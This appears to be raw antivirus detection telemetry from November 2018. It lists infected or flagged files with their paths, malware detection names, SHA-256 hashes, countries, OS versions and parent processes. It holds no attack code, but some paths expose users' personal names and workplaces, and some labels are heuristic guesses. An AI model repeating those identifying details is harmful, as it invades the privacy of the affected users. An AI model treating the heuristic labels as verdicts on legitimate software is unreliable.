  Row(detection=Row(filename='avscan-20181101-160837-4b21a8c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be284484\\AVSCAN-20181101-160819-48D3BF28\\AVSCAN-20181101-160837-4B21A8C7', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:08:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='grotty.exe', filepath='C:\\altera\\91sp2\\quartus\\bin\\cygwin\\bin\\grotty.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='1e270e47555965a89f16c71287f37b1bdc3fb17a2c188069aad8ae5271d04a87', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T09:27:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='101msdcf.exe', filepath='E:\\picture\\กล้องเราเอง\\101MSDCF\\101MSDCF.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='360c2d84c7e39c4e625b16065a5eeea83b60955a84c03e6cf3ff7c6e284e61d2', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213658-609683a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213658-609683A9', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:37:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150351-b8a094c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150351-B8A094C5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:03:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\ze3cbgo5jgt\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:31:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsj1FD6.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-01T20:48:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151417-30b42d78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151417-30B42D78', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='privacy', filepath='/Users/g.schmid/.Trash/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T20:38:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tbb.dll', filepath='C:\\Program Files (x86)\\Adobe\\Adobe Utilities - CS5\\Pixel Bender Toolkit 2\\tbb.dll', filesize=320000, name='W32/Nimnul.D.#M1.#R1'), hash='cb6fb8e4d92400da3a7030d32f1651b0a9e1a066953a412cd034775287a16a64', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T07:10:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gigiecdl.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\MODULI\\gigiecdl.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:24:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094328-f36baf9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094328-F36BAF9B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:43:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hdeck.exe', filepath='D:\\Omarlys\\CONTACTOS OMARLYS\\VIA_Win7-64_Win7_Vista64_Vista_XP64_XP_2K(v7700d)\\VIAHDAud\\Present\\HDADeck\\HDeck.exe', filesize=33792000, name='W32/Sality.AT.#M1.#R1'), hash='94daaf7ace0c643160d72ae93d67c7421c433db4d5f8ea38279a0b5d9115fa13', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Nox\\bin\\Nox.exe', parentsize=6017792, timestamp='2018-11-01T09:36:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145917-84189801', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145917-84189801', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rv.exe', filepath='\\\\?\\C:\\Users\\X\\Batch\\RV.exe', filesize=448000, name='PUA/LoadMoney.#M1.#R1'), hash='96ed3c7fa79bc55c24e85d367e8070bede957254753339120605f2356b0dc176', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T08:32:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cytexpert.exe', filepath='C:\\Program Files\\CytExpert\\CytExpert.exe', filesize=67840000, name='HEUR/AGEN.1013859.#M1.#R1'), hash='df1d9515de837d35ea4344fb3b5bf25f667222764bc8a3df3250b962e2d27467', metadata=Row(cmdline='\\\\\\/V', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=73216, timestamp='2018-11-01T01:19:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='barb .exe', filepath='\\?\\J:\\العاب\\Bomberic 2\\data\\barb\\barb .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='9fb8f194592f7d66418e8c042eb261f3bee238b62e82aa1110c01402fb309a85', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='conduttore di impianti termici.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\TERMOIDRAULICA\\CONDUTTORE DI IMPIANTI TERMICI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:14:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='90ff5982afa65ff346f5e086b5553584586b437fb5703bd55c90f197cc5ded9c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\90FF5982AFA65FF346F5E086B5553584586B437FB5703BD55C90F197CC5DED9C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='90ff5982afa65ff346f5e086b5553584586b437fb5703bd55c90f197cc5ded9c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:07:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094140-deb46db5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094140-DEB46DB5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:41:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='typeperf.exe', filepath='\\?\\H:\\WINDOWS\\system32\\typeperf.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='8ab0dd7a29c6fa0b1d3ad136649a25294faaf0277fc72cbcf63572b84002a0bd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:23:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='drq_prec.dll', filepath='C:\\CYPE Ingenieros\\Versión 2012\\programas\\drq_prec.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='92bd6c4799f60795f93ebee3011591b2d80c7ecff2deaa881b651d6f05d6c5c4', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T12:29:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='k4ijuahy33u73ootmk.exe', filepath='F:\\SzPzl0zs5yzLQXV8lE01454uFe3F54f8yhE\\k4IjUahy33u73oOtmk.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R3510'), hash='ef6cb4ac9bf0c6aeed67213b8096b15e5b6d77e62b1000705016aca1c7c252be', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T03:48:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\29d4af865fc1c2f21c02365364e4bd9d\\synctask.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='e4b6c38e78ff4fc0d5fbe2998c3558522f1186a370f41cc0a1dd516bb4c88c0b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:56:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095548-8138eb0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095548-8138EB0E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0001f494', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001f494', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:22:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T11:39:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155259-da895e5c', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_6bb2b461\\AVSCAN-20181104-154942-C4D2A19E\\AVSCAN-20181104-155259-DA895E5C', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='2ffa0baef8f7fe1c15fddfbf27e2355e9ead317e07726d0bc12cd7bbfaf5eb6e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:53:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:31:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='em000_32.dll', filepath='C:\\Program Files\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:55:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001f492', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001f492', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:22:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225744-e3c77444', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-225744-E3C77444', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:57:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='giao an lop 5 ca nam 20172018 soan rat chi tiet cktkn gdkns gdbvmt bien dao.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\Giao an lop 5 ca nam 20172018 soan rat chi tiet CKTKN GDKNS GDBVMT bien dao.exe', filesize=3456000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='4b5623ed6d755e5d916540b19be673c5c238a553fe194d57cd0137d382532598', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:16:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195224-cf0791dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-195224-CF0791DD', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:52:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10867416\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\camstudio.exe', parentsize=2998664, timestamp='2018-11-04T09:43:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210105-c6966cfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47e9d95a\\AVSCAN-20181104-210050-C3BF2C70\\AVSCAN-20181104-210105-C6966CFB', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:01:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe748_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe748 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T23:58:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:33:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nvappbar.exe', filepath='C:\\DRIVERS\\Video\\nVIDIA\\18208\\nvappbar.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='15188883ce6157f20163f061c4db7476c6ff9c1cc8a1a847fc199dfab64eb661', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Download Manager\\IEMonitor.exe', parentsize=353336, timestamp='2018-11-04T10:33:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002434e', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002434e', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:46:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-082236-48aa5561', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6d46ad8\\AVSCAN-20181104-082225-4720EC21\\AVSCAN-20181104-082236-48AA5561', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0027074.exe', filepath='D:\\System Volume Information\\_restore{0BEE0DD9-7CB5-4D18-97A2-E6F2B2544E0C}\\RP27\\A0027074.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='18ab4dcb8c149bdb6d3d68b2a47be58fd43a2f74ff97adbcd67472c66a0a9404', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:46:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tshell.exe', filepath='H:\\Aircraft_Training - All\\FedEx\\Development\\b757\\John Boyd\\Desktop files\\Work Projects\\New APS LMS\\fxaps_pslav1\\tshell.exe', filesize=64000, name='HEUR/AGEN.1028936.#M1.#R1'), hash='7e5380d1d145c3a50544ab32b609d720e65d169e6e06dba72acc7448fbda00d7', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T00:09:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-170739-f0275e53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_306b31b1\\AVSCAN-20181103-170547-E5C9B897\\AVSCAN-20181103-170739-F0275E53', filesize=14208000, name='TR/CoinMiner.593149.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T00:07:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205259-66b19927', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47e9d95a\\AVSCAN-20181104-205231-612CFB04\\AVSCAN-20181104-205259-66B19927', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-082805-c705cfa9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1bc9eed\\AVSCAN-20181104-082215-9B97DC43\\AVSCAN-20181104-082805-C705CFA9', filesize=14360000, name='PUA/Systweak.#M1.#R1'), hash='26e89330408d7767d0c79c705d1fa66beef31e3841edb1f338ebb4f15237cc1b', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:28:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132217-493d7876', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132217-493D7876', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:22:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='2b65b56963bc9381b5531a6ea0ae958c102de9ca90495bbe38c956654f350eb6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T12:58:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='offerswizarddata.dll', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\{22C7451A-E175-48C7-89C2-8BEF85809BDD}\\OffersWizardData.dll', filesize=1792000, name='ADWARE/OffersWizard.1792000.#M1.#R1'), hash='68a5b5b209642b4dc351172859cb0cb7cdc19e6cdcbebc49be2b1209ea99e657', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:14:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rdbgsetup.exe', filepath='C:\\Program Files\\Microsoft SQL Server\\100\\Shared\\VS2008\\1031\\rdbgsetup.exe', filesize=7680000, name='W32/Sality.AT.#M1.#R1'), hash='3b0738f5703a3133ababf82217ffc8ea6d381e7422ae4f25471f9db039ea11d9', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:25:14Z'), dt=datetime.date(2018, 11, 4)),
